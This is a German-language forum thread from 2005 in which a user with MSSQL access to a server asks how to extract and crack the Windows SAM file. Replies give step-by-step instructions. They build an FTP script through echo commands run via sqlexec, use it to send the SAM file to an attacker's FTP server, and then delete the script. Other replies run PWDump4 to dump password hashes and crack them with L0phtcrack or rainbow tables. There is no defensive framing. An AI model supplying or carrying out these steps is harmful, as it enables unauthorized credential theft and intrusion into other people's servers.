sam / mssql

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Napster, 25. Oktober 2005 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 25. Oktober 2005
    Also ich hab ne msql zugang und ich will da jezt die sam datei raus holen und cracken aber ich weis nicht wie das geht vllt kann mir da ja jemand helfen.


    wäre cool wenn mir jemand hilft
     

  2. Anzeige
  3. #2 26. Oktober 2005
    lol wozu willst du von nem mssql server die sam datei holen?
    lad nen ftp server drauf und starte den doch einfach
     
  4. #3 26. Oktober 2005
    manche haben ne server gute firwall und wegen router und da kann man dann ne illengalen wow gameserver drauf laufen lassen ;) ;)
     
  5. #4 26. Oktober 2005
    An die eigentliche SAM Datei (C:\WINDOWS\system32\config) kommst du unter dem laufenden Betrieb nicht ran.. Kannst höchstens probieren dir die ín C:\windows\repair zu ziehen-.

    Machste dir halt nen einfaches FTP-Script:
    Code:
    open [IP-TEMPORÄRER-FTP-SERVER]
    [username]
    [passwort]
    binary
    lcd c:\windows\repair
    put sam
    quit
    
    Kannste mit der echo Methode erzeugen (einzeln ausführen, mit sqlexec)
    Code:
    echo open [IP-TEMPORÄRER-FTP-SERVER] > c:\file.txt
    echo [username] >> c:\file.txt
    echo [passwort] >> c:\file.txt
    echo binary >> c:\file.txt
    echo lcd c:\windows\repair >> c:\file.txt
    echo put sam >> c:\file.txt
    echo quit >> c:\file.txt
    dann
    Code:
    ftp -n -v -s:c:\file.txt
    und schließlich nur noch die file.txt löschen. Sollte so gehen.
     
  6. #5 27. Oktober 2005
    Meine Windows Zeiten sind jetzt leider etwas länger her aber soweit ich mich erinnere sollte es eigentlich kein Problem sein per FTP die SAM Datei von dem Verzeichnis C:\WINDOWS (WINNT)\system32\config\ zu ziehen.

    Die Passwörter kannst du dann mit der Software "L0phcrack (LC)" versuchen zu bruten. Jedoch dauert das paar Stunden.

    Eine andere Möglichkeit wäre, dass du "PWDump" auf den Server uploadest und dann mit folgenden Parametern startest :

    Code:
    PWDump4.exe /l /o:hash.txt
    falls diese parameter nicht funktionieren versuchst du folgendes :
    Code:
    PWDump4.exe IP_DES_SERVERS /o:hash.txt
    Nun solltest du in der hash.txt die Benutzeraccounts mit den dazugehörigen hash finden. Diese kannst du wiederrum mit L0phcrack oder einem Online Rainbow Cracker bruten und die Warscheinlich ist groß dass du auch die Passwörter rausbekommst (vorrausgesetzt paar stunden) :]
     
  7. #6 27. Oktober 2005
    @Pate Die SAM Datei kann man aus dem Ordner nicht während dem Windowsbetrieb kopieren soweit ich weiß.. Ich mein die ist gesperrt (Is bei mir so)
     
  8. #7 27. Oktober 2005
    Mit FTP funktioniert das aber trotzdem ;)
     
  9. #8 27. Oktober 2005
    na is easy...evt hardware router der nix offen ;)

    am besten is immer noch type c:\winnt\repair\sam


    ansonsten halt den md5 holen dann mit rainbowcrack/l0phtcrack etc


    mfg moep
     
  10. #9 27. Oktober 2005
    ich denk mal, es wurden genügend antworten gegeben, sodass ich hier nu nen schlussstrich ziehen kann.

    closed 8)
     

  11. Videos zum Thema
Die Seite wird geladen...